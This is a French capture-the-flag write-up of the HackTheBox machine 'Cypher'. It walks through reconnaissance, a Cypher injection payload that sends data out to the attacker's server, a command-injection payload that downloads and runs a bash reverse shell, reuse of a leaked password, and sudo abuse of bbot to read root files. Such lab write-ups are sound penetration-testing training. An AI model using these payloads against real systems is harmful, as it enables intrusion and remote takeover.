Cypher HackTheBox (WriteUp)

Skills:

Java .jar file reverse engineering with JD-GUI
Vulnerability analysis of custom Java code
Cypher injection in Neo4j
Remote Code Execution (RCE) through unsanitized input
Post-exploitation enumeration and credential reuse
Privilege escalation through misconfigured sudo permissions
Secure flag extraction and cleanup procedures

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.11.57 -oG allPorts

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.11.57 -oN targeted

On ajoute ensuite l'IP à notre fichier /etc/hosts :

Analyse Web - Port 80 (HTTP)

On utilise Gobuster pour énumérer les répertoires :

gobuster dir -u http://cypher.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Dans le répertoire /testing, on trouve un fichier .jar. On l’extrait :

On observe la structure avec tree et on ouvre le .jar avec JD-GUI.

unzip custom-apoc-extension-1.0-SNAPSHOT.jar -d testing

On découvre une commande vulnérable :

String[] command = { "/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url };

Vulnérabilité : l’URL n’est pas échappée, ce qui permet une injection de commandes shell.

Injection Neo4j Cypher

Un formulaire de login est vulnérable. Une erreur s’affiche lorsqu’on entre '.

On injecte un payload Cypher pour récupérer la version de Neo4j :

{

  "username": "' OR 1=1 WITH 1 AS a CALL dbms.components() YIELD versions UNWIND versions AS version LOAD CSV FROM 'http://10.10.14.90/?v=' + version AS l RETURN 0 AS _0 //",

  "password": "test"

}

Sur notre serveur, on reçoit la requête :

python3 -m http.server 80
# --> 5.24.1

RCE via appel à `custom.getUrlStatusCode()`

On place un reverse shell dans index.html :

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.80/443 0>&1

On place un reverse shell dans index.html :

nc -nlvp 443

Utilisez l'injection conjointe pour appeler ce custom.getUrlStatusCode

{

  "username": "admin' return h.value AS value  UNION CALL custom.getUrlStatusCode(\"127.0.0.1;curl 10.10.14.90/index.html | bash;\") YIELD statusCode AS value  RETURN value ; //",
  "password": "test"

}

Amélioration du shell :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Pivoting - User Graphasm

Dans /home/graphasm/, on trouve un fichier pwn.py contenant un mot de passe

cU4btyib.20xtCMCXkBmerhK

Réutilisation de mot de passe

Flag user.txt :)

Élévation de privilèges

Sudo - bbot (binary)

Vérification des droits sudo :

sudo -l

L’utilisateur peut exécuter /usr/local/bin/bbot en root.

Contenu de /usr/local/bin/bbot :

#!/opt/pipx/venvs/bbot/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from bbot.cli import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())

Exploitation :

Ce script transmet simplement les arguments à la fonction principale de bbot. Comme nous pouvons contrôler les arguments fournis, nous pouvons exploiter une fonctionnalité de bbot pour lire n’importe quel fichier — y compris ceux qui sont accessibles uniquement par l’utilisateur root.

Après avoir consulté l’aide ou la documentation d’utilisation de bbot, nous avons identifié des options permettant de spécifier un fichier cible ainsi qu’un répertoire de sortie :

sudo /usr/local/bin/bbot -t /root/root.txt -o /tmp/root -d

Explication :

-t /root/root.txt : définit le fichier cible à traiter.
-o /tmp/root : spécifie le répertoire de sortie (là où les résultats seront stockés).
-d : active le mode débogage, au cas où des informations supplémentaires seraient nécessaires.

Comme le script s’exécute avec les privilèges root et qu’aucune validation des entrées n’est effectuée, cela nous permet de lire des fichiers arbitraires, y compris le fichier final contenant le flag root.

Mis à jour il y a 7 mois

Ce contenu vous a-t-il été utile ?